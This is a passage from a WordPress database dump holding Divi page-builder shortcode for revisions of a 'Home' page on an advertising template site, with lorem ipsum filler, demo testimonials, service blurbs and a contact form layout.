custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:55:18','2020-07-04 21:55:18','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(185,1,'2020-07-04 22:00:02','2020-07-04 22:00:02','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"55px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" hover_enabled=\"0\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" animation_duration=\"1200ms\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" hover_enabled=\"0\" custom_padding_last_edited=\"on|tablet\" custom_padding_phone=\"12px||40px||false|false\" custom_padding_tablet=\"20px||||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row 